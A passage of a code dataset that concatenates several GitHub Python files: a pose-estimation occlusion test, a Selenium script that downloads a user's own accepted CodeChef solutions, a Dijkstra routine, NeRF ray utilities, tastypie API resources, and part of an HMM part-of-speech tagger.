candB = all_peaks[limbSeq[k][1]-1]\n nA = len(candA)\n nB = len(candB)\n indexA, indexB = limbSeq[k]\n if(nA != 0 and nB != 0):\n connection_candidate = []\n for i in range(nA):\n for j in range(nB):\n vec = np.subtract(candB[j][:2], candA[i][:2])\n norm = np.sqrt(vec[0]*vec[0] + vec[1]*vec[1])\n vec = np.divide(vec, norm)\n\n startend = list(zip(np.linspace(candA[i][0], candB[j][0], num=mid_num),\n np.linspace(candA[i][1], candB[j][1], num=mid_num)))\n\n vec_x = np.array([score_mid[int(round(startend[I][1])), int(round(startend[I][0])), 0]\n for I in range(len(startend))])\n vec_y = np.array([score_mid[int(round(startend[I][1])), int(round(startend[I][0])), 1]\n for I in range(len(startend))])\n\n score_midpts = np.multiply(vec_x, vec[0]) + np.multiply(vec_y, vec[1])\n score_with_dist_prior = sum(score_midpts)/len(score_midpts) + min(0.5*oriImg.shape[0]/norm-1, 0)\n criterion1 = len(np.nonzero(score_midpts > th2)[0]) > 0.8 * len(score_midpts)\n criterion2 = score_with_dist_prior > 0\n if criterion1 and criterion2:\n connection_candidate.append([i, j, score_with_dist_prior, score_with_dist_prior+candA[i][2]+candB[j][2]])\n\n connection_candidate = sorted(connection_candidate, key=lambda x: x[2], reverse=True)\n connection = np.zeros((0,5))\n for c in range(len(connection_candidate)):\n i,j,s = connection_candidate[c][0:3]\n if(i not in connection[:,3] and j not in connection[:,4]):\n connection = np.vstack([connection, [candA[i][3], candB[j][3], s, i, j]])\n if(len(connection) >= min(nA, nB)):\n break\n\n connection_all.append(connection)\n else:\n special_k.append(k)\n connection_all.append([])\n\n # last number in each row is the total parts number of that person\n # the second last number in each row is the score of the overall configuration\n subset = -1 * np.ones((0, 20))\n candidate = np.array([item for sublist in all_peaks for item in sublist])\n\n for 
k in range(len(mapIdx)):\n if k not in special_k:\n partAs = connection_all[k][:,0]\n partBs = connection_all[k][:,1]\n indexA, indexB = np.array(limbSeq[k]) - 1\n\n for i in range(len(connection_all[k])): #= 1:size(temp,1)\n found = 0\n subset_idx = [-1, -1]\n for j in range(len(subset)): #1:size(subset,1):\n if subset[j][indexA] == partAs[i] or subset[j][indexB] == partBs[i]:\n subset_idx[found] = j\n found += 1\n\n if found == 1:\n j = subset_idx[0]\n if(subset[j][indexB] != partBs[i]):\n subset[j][indexB] = partBs[i]\n subset[j][-1] += 1\n subset[j][-2] += candidate[partBs[i].astype(int), 2] + connection_all[k][i][2]\n elif found == 2: # if found 2 and disjoint, merge them\n j1, j2 = subset_idx\n print(\"found = 2\")\n membership = ((subset[j1]>=0).astype(int) + (subset[j2]>=0).astype(int))[:-2]\n if len(np.nonzero(membership == 2)[0]) == 0: #merge\n subset[j1][:-2] += (subset[j2][:-2] + 1)\n subset[j1][-2:] += subset[j2][-2:]\n subset[j1][-2] += connection_all[k][i][2]\n subset = np.delete(subset, j2, 0)\n else: # as like found == 1\n subset[j1][indexB] = partBs[i]\n subset[j1][-1] += 1\n subset[j1][-2] += candidate[partBs[i].astype(int), 2] + connection_all[k][i][2]\n\n # if find no partA in the subset, create a new subset\n elif not found and k < 17:\n row = -1 * np.ones(20)\n row[indexA] = partAs[i]\n row[indexB] = partBs[i]\n row[-1] = 2\n row[-2] = sum(candidate[connection_all[k][i,:2].astype(int), 2]) + connection_all[k][i][2]\n subset = np.vstack([subset, row])\n\n # delete some rows of subset which has few parts occur\n deleteIdx = [];\n for i in range(len(subset)):\n if subset[i][-1] < 4 or subset[i][-2]/subset[i][-1] < 0.4:\n deleteIdx.append(i)\n subset = np.delete(subset, deleteIdx, axis=0)\n\n if len(subset) == 0:\n return np.array([[-1, -1]] * 18).astype(int)\n\n cordinates = []\n result_image_index = np.argmax(subset[:, -2])\n\n for part in subset[result_image_index, :18]:\n if part == -1:\n cordinates.append([-1, -1])\n else:\n Y = candidate[part.astype(int), 0]\n X = candidate[part.astype(int), 1]\n cordinates.append([X, Y])\n return np.array(cordinates).astype(int)\n\n\n#def cordinates_from_image_file(image_name, model):\n# oriImg = imread(image_name)[:, :, ::-1] # B,G,R order\ndef cordinates_from_image_file(image, model):\n oriImg = image[:, :, ::-1]\n\n multiplier = [x * boxsize / oriImg.shape[0] for x in scale_search]\n\n heatmap_avg = np.zeros((oriImg.shape[0], oriImg.shape[1], 19))\n paf_avg = np.zeros((oriImg.shape[0], oriImg.shape[1], 38))\n\n for m in range(len(multiplier)):\n scale = multiplier[m]\n\n new_size = (np.array(oriImg.shape[:2]) * scale).astype(np.int32)\n imageToTest = resize(oriImg, new_size, order=3, preserve_range=True)\n imageToTest_padded = imageToTest[np.newaxis, :, :, :]/255 - 0.5\n\n output1, output2 = model.predict(imageToTest_padded)\n\n heatmap = st.resize(output2[0], oriImg.shape[:2], preserve_range=True, order=1)\n paf = st.resize(output1[0], oriImg.shape[:2], preserve_range=True, order=1)\n heatmap_avg += heatmap\n paf_avg += paf\n\n heatmap_avg /= len(multiplier)\n pose_cords = compute_cordinates(heatmap_avg, paf_avg, oriImg=oriImg)\n return pose_cords\n\n# Estimate 2D-pose for a single image\n# output np array coordinates and color images\ndef estimate_all(folder, model):\n if not os.path.isdir(folder):\n print('Warning: Directory does not exist...')\n return\n\n pose_folder = folder.replace('images', 'poses')\n if os.path.isdir(pose_folder):\n print('Cached poses found')\n else:\n os.mkdir(pose_folder)\n image_list = [name for 
name in os.listdir(folder) if name.endswith('.jpg')]\n for name in tqdm(image_list):\n im_name = os.path.join(folder, name)\n img = imread(im_name)\n pose_cords = np.array(cordinates_from_image_file(img, model=model))\n new_path = im_name.replace(folder, pose_folder)\n color, _ = pose_utils.draw_pose_from_cords(pose_cords, (256,256))\n imsave(new_path, color)\n new_path = new_path.replace('.jpg', '.pose.npy')\n np.save(new_path, pose_cords)\n\n return pose_folder\n\n# Make bad examples by cutting some limbs\ndef make_bad_images(image_folder, bad_image_folder, limbs, cut_width = 5):\n if not os.path.exists(bad_image_folder):\n os.mkdir(bad_image_folder)\n\n pose_folder = image_folder.replace('images', 'poses')\n assert(os.path.exists(pose_folder))\n\n image_list = [name for name in os.listdir(image_folder) if name.endswith('.jpg')]\n for name in tqdm(image_list):\n img = imread(os.path.join(image_folder, name))\n pose = np.load(os.path.join(pose_folder, name.replace('.jpg','.pose.npy')))\n bad_im_name = os.path.join(bad_image_folder, name)\n amputate_limbs(img, pose, bad_im_name, limbs, cut_width)\n\n# Amputate limbs by drawing a black bar at middle point of the bone\n# input:\n# @ An image of 256*256\n# @ A corresponding pose locations\n# @ limbs: lthigh, rthigh, lshin, rshin\n\n\nlimbjoints = {'lthigh': (8,9), 'lshin': (9,10), 'rthigh': (11,12), 'rshin': (12,13), 'larm': (2,3), 'rarm': (5,6)}\n\ndef amputate_limbs(img, pose, bad_im_name, limbs, bar_width, half_bar_length=20):\n pose = pose.astype(np.float)\n for name in limbs:\n joints = limbjoints[name]\n if any(pose[joints, 0] == -1):\n continue\n \n midpoint = np.sum(pose[joints, :], axis=0) / 2\n direction = np.squeeze(np.array([[1, -1]]) @ pose[joints, :]) # equivalent to p[0] - p[1]\n length = np.sqrt(direction[0] ** 2 + direction[1] ** 2)\n direction /= length\n norm_vec = np.array([direction[1], -direction[0]])\n\n rects = np.stack([midpoint - norm_vec * half_bar_length - direction * bar_width,\n midpoint - norm_vec * half_bar_length + direction * bar_width,\n midpoint + norm_vec * half_bar_length + direction * bar_width,\n midpoint + norm_vec * half_bar_length - direction * bar_width,\n midpoint - norm_vec * half_bar_length - direction * bar_width]).astype(int)\n rr, cc = polygon(rects[:, 0], rects[:, 1], shape=(256,256))\n rr = np.minimum(np.maximum(rr, 0), 255)\n cc = np.minimum(np.maximum(cc, 0), 255)\n # use opposite color from the middle point\n midpoint = midpoint.astype(int)\n rgb = img[midpoint[0], midpoint[1]]\n img[rr, cc, :] = 255 - rgb\n\n imsave(bad_im_name, img)\n\n\ndef calculate_missing_rate(pose_folder, bad_pose_folder, dataset_name):\n pose_list = [name for name in os.listdir(pose_folder) if name.endswith('.pose.npy')]\n total_num = len(pose_list)\n rate = 0\n with open('bad_pose_list.txt', 'w') as file:\n for item in pose_list:\n good_pose = np.load(os.path.join(pose_folder, item))\n bad_pose = np.load(os.path.join(bad_pose_folder, item))\n miss_point = any(good_pose[i, 0] >= 0 and bad_pose[i, 0] == -1 for i in range(18))\n if miss_point:\n rate += 1\n file.write('{}\\n'.format(item))\n\n return {dataset_name: rate / total_num}\n\nif __name__ == \"__main__\":\n\n # image_folder = 'D:/data/ntu_image_skeleton/all'\n # list = sorted([name for name in os.listdir(image_folder) if name.endswith('.jpg')])\n # number = 200\n # list = list[0:number]\n # dest_folder = 'D:/Yanglingbo_Workspace_new/Projects/Python/TensorFlow/pose-estimator-test/good_ntu_images'\n #\n # from shutil import copyfile\n # for item in list:\n # 
copyfile(os.path.join(image_folder, item),\n # os.path.join(dest_folder, item))\n\n image_folder = 'good_ntu_images'\n model = load_model('./pose_estimator.h5')\n pose_folder = estimate_all(image_folder, model)\n bad_image_folder = image_folder.replace('good', 'bad')\n make_bad_images(image_folder, bad_image_folder, limbs = ['larm', 'rarm', 'lthigh', 'rthigh'], cut_width = 8)\n bad_pose_folder = estimate_all(bad_image_folder, model)\n rate = calculate_missing_rate(pose_folder, bad_pose_folder, 'ntu')\n for k, v in rate.items():\n print('{} missing rate: {:.3f}'.format(k, v))\n","repo_name":"Lotayou7355608/openpose-occlusion-test","sub_path":"pose_estimator_test.py","file_name":"pose_estimator_test.py","file_ext":"py","file_size_in_byte":13560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"34973523386","text":"from selenium import webdriver\nimport time\nimport os\nfrom selenium.common.exceptions import NoSuchElementException\nimport getpass\nimport tkinter as tk\n\nuser_name = input('Enter Your Handle / Email: ')\nuser_password = getpass.getpass()\nwait_time = 2\nuser_to_download = user_name\n\n\ndef getClipboardText():\n root = tk.Tk()\n # keep the window from showing\n root.withdraw()\n return root.clipboard_get()\n\n\ndef get_extension(language):\n if 'C++' in language:\n return '.cpp'\n elif 'JAVA' in language:\n return '.java'\n elif 'PYTH' in language:\n return '.py'\n elif 'C' in language:\n return '.c'\n else:\n return '.txt'\n\n\noptions = webdriver.ChromeOptions()\noptions.add_argument('--ignore-certificate-errors')\noptions.add_argument(\"--test-type\")\n\ndriver = webdriver.Chrome(chrome_options=options)\n\n# logging in\n\nprint(\"Logging in\")\n\ndriver.get(\"https://www.codechef.com/\")\nuserForm = driver.find_element_by_name('name')\npasswordForm = driver.find_element_by_name('pass')\nuserForm.send_keys(user_name)\npasswordForm.send_keys(user_password)\ndriver.find_element_by_name('op').click()\ntime.sleep(wait_time)\n\n\nif driver.current_url == \"https://www.codechef.com/\":\n print(\"Login failed\")\n driver.quit()\n exit(0)\n\nif driver.current_url == \"https://www.codechef.com/session/limit\":\n boxes = driver.find_elements_by_class_name('form-checkbox')\n for i in range(len(boxes) - 1):\n boxes[i].click()\n driver.find_element_by_name('op').click()\n\n\ndriver.get(\"https://www.codechef.com/users/\" + user_to_download)\nsubmissions = driver.find_elements_by_tag_name('a')\nlinks = []\nfor submission in submissions:\n link = submission.get_attribute('href')\n if link is not None and link.endswith(user_to_download):\n links.append(link)\n # print(link)\n\ncompleted = 0\nfor link in links:\n driver.get(link)\n time.sleep(wait_time)\n try:\n verdicts = driver.find_elements_by_xpath(\n '//*[@id=\"primary-content\"]/div/div[3]/table/tbody/tr/td[4]/span')\n source_links = driver.find_elements_by_xpath(\n '//*[@id=\"primary-content\"]/div/div[3]/table/tbody/tr/td[8]/ul/li/a')\n languages = driver.find_elements_by_xpath(\n '//*[@id=\"primary-content\"]/div/div[3]/table/tbody/tr/td[7]')\n except:\n print(\"Error Occured in submission page\")\n problemName = \"\"\n sourceCode = \"\"\n probableProblemNameLinks = driver.find_elements_by_xpath(\n '//*[@id=\"breadcrumb\"]/div/a')\n for probableProblemNameLink in probableProblemNameLinks:\n if \"problems\" in probableProblemNameLink.get_attribute('href'):\n problemName = probableProblemNameLink.text.replace('?', '')\n assert(len(verdicts) == len(source_links))\n\n for i in 
range(len(verdicts)):\n if verdicts[i].get_attribute('title') == \"accepted\" or \"100\" in verdicts[i].text:\n\n language = languages[i].text\n directory = os.path.join(\n os.getcwd(), 'CodeChef ' + user_to_download)\n path = os.path.join(directory, problemName +\n get_extension(language))\n if os.path.exists(path) == False:\n try:\n driver.get(source_links[i].get_attribute('href'))\n time.sleep(wait_time)\n driver.find_element_by_id(\n 'copy-button').click()\n sourceCode = getClipboardText()\n except:\n print(\"Error Occured in source code page\")\n else:\n print(problemName + \" Already Downlaoded\")\n if len(problemName) > 0 and len(sourceCode) > 0:\n if not os.path.exists(directory):\n os.makedirs(directory)\n f = open(path, 'w+')\n f.write(sourceCode)\n f.close()\n break\n completed += 1\n print('Download completed: ' + str(float(\"%0.2f\" %\n ((completed * 100) / len(links)))) + \"%\")\n\n\ndriver.quit()\n","repo_name":"njrafi/Code-Downloaders","sub_path":"codeChef.py","file_name":"codeChef.py","file_ext":"py","file_size_in_byte":4072,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"24333871216","text":"def dijkstra(graph, source):\n dist = [float('inf')] * len(graph)\n dist[source] = 0\n \n # Create a set to track the nodes that have been processed.\n visited = set()\n \n # Set the current node to the source node.\n current_node = source\n \n # Loop until all nodes have been processed.\n while len(visited) != len(graph):\n # For each neighbor of the current node, calculate the distance to the neighbor\n # using the weight of the edge connecting the current node and the neighbor.\n # If the calculated distance is less than the current value in the distance array\n # for that neighbor, update the distance array with the new shorter distance.\n for neighbor, weight in graph[current_node].items():\n if neighbor not in visited:\n dist[neighbor] = min(dist[neighbor], dist[current_node] + weight)\n \n # Add the current node to the visited set and mark it as processed.\n visited.add(current_node)\n \n # Set the current node to the unvisited node with the smallest distance.\n current_node = min(set(range(len(graph))) - visited, key=lambda x: dist[x])\n \n # Return the distance array.\n return dist","repo_name":"SineshX/leetcode","sub_path":"python/dijkstra.py","file_name":"dijkstra.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"20263597418","text":"from typing import Tuple\n\nimport torch\n\n\ndef create_rays(num_images: int, Ts_c2w: torch.Tensor, height: int, width: int, fx: float, fy: float, cx: float,\n cy: float, near: float, far: float, use_view_dirs: bool = True):\n \"\"\"\n Convention details: \"opencv\" or \"opengl\".\n It defines the coordinates convention of rays from cameras.\n OpenCV defines x,y,z as right, down, forward while OpenGL defines x,y,z as right, up, backward\n (camera looking towards forward direction still, -z!).\n\n Note: Use either convention is fine, but the corresponding pose should follow the same convention.\n \"\"\"\n\n rays_cam = _get_rays_camera(num_images, height, width, fx, fy, cx, cy) # [N, H, W, 3]\n\n dirs_C = rays_cam.view(num_images, -1, 3) # [N, HW, 3]\n rays_o, rays_d = _get_rays_world(Ts_c2w, dirs_C) # origins: [B, HW, 3], dirs_W: [B, HW, 3]\n\n if use_view_dirs:\n # Providing ray directions as input\n view_dirs = rays_d / torch.norm(rays_d, dim=-1, keepdim=True).float()\n\n 
near, far = near * torch.ones_like(rays_d[..., :1]), far * torch.ones_like(rays_d[..., :1])\n rays = torch.cat([rays_o, rays_d, near, far], -1)\n\n if use_view_dirs:\n rays = torch.cat([rays, view_dirs], -1)\n\n return rays\n\n\ndef _get_rays_camera(B: int, H: int, W: int, fx: float, fy: float, cx: float, cy: float) -> torch.Tensor:\n \"\"\"\n Getting rays from camera perspective\n \"\"\"\n\n # Pytorch's meshgrid has indexing \"ij\", by transposing it we get \"xy\"\n i, j = torch.meshgrid(torch.arange(W), torch.arange(H))\n i = i.t().float()\n j = j.t().float()\n\n size = [B, H, W]\n\n i_batch = torch.empty(size)\n j_batch = torch.empty(size)\n i_batch[:, :, :] = i[None, :, :]\n j_batch[:, :, :] = j[None, :, :]\n\n x = (i_batch - cx) / fx\n y = (j_batch - cy) / fy\n z = torch.ones(size)\n\n dirs = torch.stack((x, y, z), dim=3) # shape of [B, H, W, 3], 3 comes from x, y, z not channels,\n # channels contain redundant info for spa\n return dirs\n\n\ndef _get_rays_world(T_WC: torch.Tensor, dirs_C: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor]:\n \"\"\"\n Getting rays in world coordinates\n \"\"\"\n\n R_WC = T_WC[:, :3, :3] # Bx3x3\n dirs_W = torch.matmul(R_WC[:, None, ...], dirs_C[..., None]).squeeze(-1)\n origins = T_WC[:, :3, -1] # Bx3\n origins = torch.broadcast_tensors(origins[:, None, :], dirs_W)[0]\n\n return origins, dirs_W\n\n\ndef sample_pdf(bins, weights, N_samples, det=False):\n \"\"\"\n Hierarchical sampling using inverse CDF transformations.\n Sample @N_importance samples from @bins with distribution defined by @weights.\n\n Inputs:\n bins: N_rays x (N_samples_coarse - 1)\n weights: N_rays x (N_samples_coarse - 2)\n N_samples: N_samples_fine\n det: deterministic or not\n \"\"\"\n\n # Get pdf\n weights = weights + 1e-5 # prevent nans, prevent division by zero (don't do inplace op!)\n pdf = weights / torch.sum(weights, -1, keepdim=True)\n cdf = torch.cumsum(pdf, -1) # N_rays x (N_samples - 2)\n cdf = torch.cat([torch.zeros_like(cdf[..., :1]), cdf], -1) # N_rays x (N_samples_coarse - 1)\n # padded to 0~1 inclusive, (N_rays, N_samples-1)\n\n # Take uniform samples\n if det: # generate deterministic samples\n u = torch.linspace(0., 1., steps=N_samples, device=bins.device)\n u = u.expand(list(cdf.shape[:-1]) + [N_samples])\n else:\n u = torch.rand(list(cdf.shape[:-1]) + [N_samples], device=bins.device)\n # (N_rays, N_samples_fine)\n\n # Invert CDF\n u = u.contiguous()\n inds = torch.searchsorted(cdf.detach(), u, right=True) # N_rays x N_samples_fine\n below = torch.max(torch.zeros_like(inds - 1), inds - 1)\n above = torch.min((cdf.shape[-1] - 1) * torch.ones_like(inds), inds)\n inds_g = torch.stack([below, above], -1) # (N_rays, N_samples_fine, 2)\n\n matched_shape = [inds_g.shape[0], inds_g.shape[1], cdf.shape[-1]] # (N_rays, N_samples_fine, N_samples_coarse - 1)\n\n cdf_g = torch.gather(cdf.unsqueeze(1).expand(matched_shape), 2, inds_g) # N_rays, N_samples_fine, 2\n bins_g = torch.gather(bins.unsqueeze(1).expand(matched_shape), 2, inds_g) # N_rays, N_samples_fine, 2\n\n denom = (cdf_g[..., 1] - cdf_g[..., 0]) # # N_rays, N_samples_fine\n denom = torch.where(denom < 1e-5, torch.ones_like(denom), denom)\n # denom equals 0 means a bin has weight 0, in which case it will not be sampled\n # anyway, therefore any value for it is fine (set to 1 here)\n\n t = (u - cdf_g[..., 0]) / denom\n samples = bins_g[..., 0] + t * (bins_g[..., 1] - bins_g[..., 0])\n\n return 
samples\n","repo_name":"dmjovan/NeRF-Workspaces-Explorer","sub_path":"nerf/rays/rays.py","file_name":"rays.py","file_ext":"py","file_size_in_byte":4595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"73714509385","text":"from tastypie.resources import ModelResource, ALL\nfrom tastypie.authorization import Authorization\nfrom tastypie import fields\nfrom API.models import Investment, Updates\n\n\nclass InvestmentResource(ModelResource):\n\n class Meta:\n queryset = Investment.objects.all()\n list_allowed_methods = ['get', 'post']\n detail_allowed_methods = ['get', 'post']\n filtering = {\n 'date': ALL,\n }\n resource_name = 'investment'\n authorization = Authorization()\n fields = ['company', 'quantity', 'cost', 'date']\n excludes = ['id']\n\n\nclass UpdatesResource(ModelResource):\n\n investment = fields.ForeignKey(InvestmentResource, 'investment')\n\n class Meta:\n queryset = Updates.objects.all()\n list_allowed_methods = ['get', 'post']\n detail_allowed_methods = ['get', 'post']\n filtering = {\n 'date': ALL,\n 'date_entered': ('lte',),\n 'investment_id': ALL\n }\n resource_name = 'updates'\n authorization = Authorization()\n fields = ['quantity', 'cost', 'investment', 'date']\n excludes = ['id']\n\n#Finally got POST call to work to create updates\n# {\n# \"quantity\" : 5,\n# \"cost\" : 10,\n# \"investment\" : \"/api/investment/3/\"\n# }\n","repo_name":"elizabethlarkinnelson/Portfolio_API","sub_path":"portfolio_api_project/API/resources.py","file_name":"resources.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"39265630988","text":"import numpy,re,random\nimport math\nimport itertools\nimport operator\n\n\nclass smartsolver:\n\n\tdef __init__(self):\n\t\tself.word_dict = {}\n\t\tself.word_dict_reverse = {}\n\t\tself.pos_dict = {}\n\t\tself.pos_dict_reverse = {}\n\t\tself.word_count = 0\n\t\tself.pos_count = 0\n\t\tself.ProbTables = {}\n\t\tself.defaultWordProbability = 0.00\n\t\tself.cache = {}\n\n\tdef getFromDict(self,dataDict, mapList):\n\t\ttry:\n\t\t\tvalue = reduce(lambda d, k: d[k], mapList, dataDict)\n\t\t\treturn value\n\t\texcept:\n\t\t\treturn None\n\n\tdef most_common(self,L):\n\t\td = {}\n\t\tfor i in L:\n\t\t\tif i not in d:\n\t\t\t\td[i] = 0\n\t\t\telse:\n\t\t\t\td[i] += 1\n\t\tmax = \"1\"\n\t\tmaxc = 0\n\t\tfor i in d:\n\t\t\tif maxc < d[i]:\n\t\t\t\tmax = i\n\t\t\t\tmaxc = d[i]\n\t\treturn max\n\n\tdef setInDict(self,given_dataDict, given_maplist, value):\n\t\tif len(given_maplist) == 1:\n\t\t\tgiven_dataDict[given_maplist[0]] = value\n\t\telse:\n\t\t\tif given_maplist[0] in given_dataDict:\n\t\t\t\tnewmaplist = given_maplist[1:][:]\n\t\t\t\tself.setInDict(given_dataDict[given_maplist[0]], newmaplist,value)\n\t\t\telse:\n\t\t\t\ti=len(given_maplist)-1\n\t\t\t\twhile i > 0:\n\t\t\t\t\tnew_dict = {given_maplist[i]:value}\n\t\t\t\t\tvalue = new_dict\n\t\t\t\t\ti -= 1\n\t\t\t\tgiven_dataDict[given_maplist[0]]=value\n\n\tdef is_number(self,s):\n\t\ttry:\n\t\t\tfloat(s)\n\t\t\treturn True\n\t\texcept ValueError:\n\t\t\treturn False\n\n\tdef smarttrain(self,data):\n\n\t\tfor (s, gt) in data:\n\t\t\tfor word in s:\n\t\t\t\tif word not in self.word_dict:\n\t\t\t\t\tif self.is_number(word):\n\t\t\t\t\t\tself.word_dict[\"1\"] = self.word_count\n\t\t\t\t\t\tself.word_dict_reverse[self.word_count] = \"1\"\n\t\t\t\t\telse:\n\t\t\t\t\t\tself.word_dict[word] = 
self.word_count\n\t\t\t\t\t\tself.word_dict_reverse[self.word_count] = word\n\t\t\t\t\tself.word_count += 1\n\t\t\tfor tag in gt:\n\t\t\t\tif tag not in self.pos_dict:\n\t\t\t\t\tself.pos_dict[tag] = self.pos_count\n\t\t\t\t\tself.pos_dict_reverse[self.pos_count] = tag\n\t\t\t\t\tself.pos_count += 1\n\n\t\ttable1 = numpy.zeros(shape=(self.word_count, self.pos_count)).astype(int)\n\n\t\tfor (s ,gt) in data:\n\t\t\tfor i in range(0, len(s)):\n\t\t\t\ttable1[self.word_dict[s[i]]][self.pos_dict[gt[i]]] += 1\n\t\ttable8 = table1.sum(axis=1)\n\t\ttable9 = numpy.zeros(shape=self.word_count).astype(float)\n\t\twordcount = table1.sum()\n\t\tfor i in range(0, self.word_count):\n\t\t\ttable9[i] = float(table8[i])/float(wordcount)\n\t\tself.defaultWordProbability = table9.min()\n\n\n\t\ttable3 = table1.sum(axis=0)\n\t\ttotal = 0\n\t\tfor (s, gt) in data:\n\t\t\ttotal += len(s)\n\t\ttable2 = numpy.zeros(shape=(1, self.pos_count)).astype(float)\n\t\tfor i in range(0,self.pos_count):\n\t\t\ttable2[0][i] = float(table3[i])/float(total)\n\n\t\ttable4 = numpy.zeros(shape=(self.pos_count, self.pos_count)).astype(float)\n\t\tfor (s, gt) in data:\n\t\t\tfor i in range(1, len(gt)):\n\t\t\t\ttable4[self.pos_dict[gt[i-1]]][self.pos_dict[gt[i]]] += 1\n\t\ttable5 = table4.sum(axis=1)\n\n\n\t\tfor i in range(0, self.pos_count):\n\t\t\tfor j in range(0, self.pos_count):\n\t\t\t\ttable4[i][j]=float(table4[i][j])/float(table5[i])\n\t\ttable6 = numpy.zeros(shape=(self.pos_count, self.pos_count)).astype(float)\n\t\tnumpy.copyto(table6, table4)\n\t\ttable7 = table6.sum(axis = 0)\n\t\tfor i in range(0, self.pos_count):\n\t\t\tfor j in range(0, self.pos_count):\n\t\t\t\ttable6[j][i] = float(table6[j][i])/float(table7[i])\n\n\t\tself.ProbTables[\"CountWordTag\"] = table1\n\t\tself.ProbTables[\"ProbTag\"] = table2\n\t\tself.ProbTables[\"CountTag\"] = table3\n\t\tself.ProbTables[\"ProbTagSet\"] = table4\n\t\tself.ProbTables[\"ProbTagSetTranspose\"] = table6\n\t\tself.ProbTables[\"PorbWord\"] = table9\n\n\t\treturn self.ProbTables\n\n\tdef naiveAlgo(self, sentence):\n\t\tnaiveTag = []\n\t\twordTag = {}\n\t\tresult = []\n\t\tfor i in range(0, len(sentence)):\n\t\t\tprobability = -1\n\t\t\ttag = None\n\t\t\tmaxTagValue = \"\"\n\t\t\tif sentence[i] not in self.word_dict:\n\t\t\t\tproceed = 1\n\t\t\t\tif(bool(re.search(r'\\d', sentence[i]))) == True:\n\t\t\t\t\tproceed = 0\n\t\t\t\t\tresult.append('1')\n\n\t\t\t\tif len(result) > 0 and proceed == 1:\n\t\t\t\t\tmaxTag = 0\n\t\t\t\t\tfor j in range(0,self.pos_count):\n\t\t\t\t\t\tprevTag = self.ProbTables[\"ProbTagSet\"][self.pos_dict[result[i-1]]][j]\n\t\t\t\t\t\tif prevTag > maxTag:\n\t\t\t\t\t\t\tmaxTag = prevTag\n\t\t\t\t\t\t\tmaxTagValue = self.pos_dict_reverse[j]\n\n\t\t\t\t\tresult.append(maxTagValue)\n\t\t\t\telif proceed == 1:\n\t\t\t\t\tmaxProb = self.ProbTables[\"ProbTag\"].argmax()\n\t\t\t\t\tmaxTag = self.pos_dict_reverse[maxProb]\n\t\t\t\t\tresult.append(maxTag)\n\n\t\t\telse:\n\t\t\t\tfor j in range(0,self.pos_count):\n\t\t\t\t\tif i==0:\n\t\t\t\t\t\tprob = float(self.ProbTables[\"CountWordTag\"][self.word_dict[sentence[i]]][j])/float(self.ProbTables[\"CountTag\"][j]) * self.wsi(j)\n\t\t\t\t\telse:\n\t\t\t\t\t\tprob = float(self.ProbTables[\"CountWordTag\"][self.word_dict[sentence[i]]][j])/float(self.ProbTables[\"CountTag\"][j]) * self.wsi(j)*self.ProbTables[\"ProbTagSet\"][self.pos_dict[result[-1]]][j]\n\t\t\t\t\tif prob > probability:\n\t\t\t\t\t\tprobability = prob\n\t\t\t\t\t\ttag = self.pos_dict_reverse[j]\n\t\t\t\tresult.append(tag)\n\t\t\t\twordTag[sentence[i]] 
= tag\n\n\t\treturn [[[self.most_common(result)]*len(result)],[]]\n\t\t#return [[[\"1\"]*len(sentence)],[]]\n\n\tdef wsi(self, i):\n\t\treturn self.ProbTables[\"ProbTag\"][0][i]\n\n\tdef esiwi(self, tag_index, word):\n\t\tif word in self.word_dict:\n\t\t\tword_tag_count = self.ProbTables[\"CountWordTag\"][self.word_dict[word]][tag_index]\n\t\t\ttag_count = self.ProbTables[\"CountTag\"][tag_index]\n\t\t\treturn float(word_tag_count)/float(tag_count)\n\t\telse:\n\t\t\treturn 1.0/12.0\n\n\tdef psiminus1si(self, tag_index1, tag_index2):\n\t\treturn self.ProbTables[\"ProbTagSetTranspose\"][tag_index1][tag_index2]\n\tdef psiplus1si(self, tag_index1, tag_index2):\n\t\treturn self.ProbTables[\"ProbTagSet\"][tag_index1][tag_index2]\n\n\tdef smartviterbi(self,sentence):\n\t\tsmarttree = numpy.zeros(shape=(self.pos_count,len(sentence),2))\n\n\t\tfor i in range(0, self.pos_count):\n\t\t\tsmarttree[i][0][1] = -1\n\n\t\tmax = 0\n\t\tfor i in range(0, self.pos_count):\n\t\t\tvalue = self.wsi(i)*self.esiwi(i,sentence[0])\n\t\t\tif value > max:\n\t\t\t\tmax = value\n\t\t\tsmarttree[i][0][0] = value\n\n\t\tfor i in range(0, self.pos_count):\n\t\t\tsmarttree[i][0][0] = smarttree[i][0][0]/max\n\n\n\t\tfor t in range(1,len(sentence)):\n\t\t\tmax_column = 0\n\t\t\tfor s in range(0, self.pos_count):\n\t\t\t\tmax_value = 0\n\t\t\t\tesiwi = self.esiwi(s,sentence[t])\n\t\t\t\tif esiwi != 0:\n\t\t\t\t\tfor olds in range(0, self.pos_count):\n\t\t\t\t\t\tval = smarttree[olds][t-1][0]*self.ProbTables[\"ProbTagSet\"][olds][s]\n\t\t\t\t\t\tif val > max_value:\n\t\t\t\t\t\t\tmax_value = val\n\t\t\t\t\t\t\tsmarttree[s][t][0] = val\n\t\t\t\t\t\t\tsmarttree[s][t][1] = olds\n\t\t\t\tsmarttree[s][t][0] *= esiwi\n\t\t\t\tif smarttree[s][t][0] > max_column:\n\t\t\t\t\tmax_column = smarttree[s][t][0]\n\t\t\tfor s in range(0, self.pos_count):\n\t\t\t\tsmarttree[s][t][0] = smarttree[s][t][0]/max_column\n\n\t\tmax_value = 0\n\t\tmax_index = 0\n\t\tfor s in range(0, self.pos_count):\n\t\t\tif smarttree[s][len(sentence)-1][0] > max_value:\n\t\t\t\tmax_value = smarttree[s][len(sentence)-1][0]\n\t\t\t\tmax_index = s\n\n\t\tresult = [\"1\"] * len(sentence)\n\t\tresult[len(sentence)-1] = self.pos_dict_reverse[max_index]\n\n\t\tt = len(sentence)-1\n\t\twhile t >= 1:\n\t\t\tmax_index = 